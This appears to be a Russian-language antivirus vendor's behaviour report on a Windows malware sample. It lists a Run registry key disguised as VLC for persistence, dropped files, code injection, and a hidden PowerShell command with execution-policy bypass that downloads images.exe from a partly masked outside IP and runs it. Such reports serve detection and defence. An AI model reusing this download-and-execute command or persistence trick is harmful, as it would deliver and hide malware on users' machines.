Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'vlc' = '"%APPDATA%\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe"'
Вредоносные функции
Загружает и запускает на исполнение
- http://13.##.228.87/excel/images.exe как %appdata%\images.exe
Внедряет код в
следующие пользовательские процессы:
- images.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\abctfhghgdghghž.sct
- %APPDATA%\images.exe
- %APPDATA%\microsoft\windows\start menu\programs\videolan\vlc.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://13.##.228.87/excel/images.exe
Другое
Создает и запускает на исполнение
- '%APPDATA%\images.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://13.##.228.87/excel/images.exe','%APPDATA%\images.exe');Start-Process '...' (со скрытым окном)
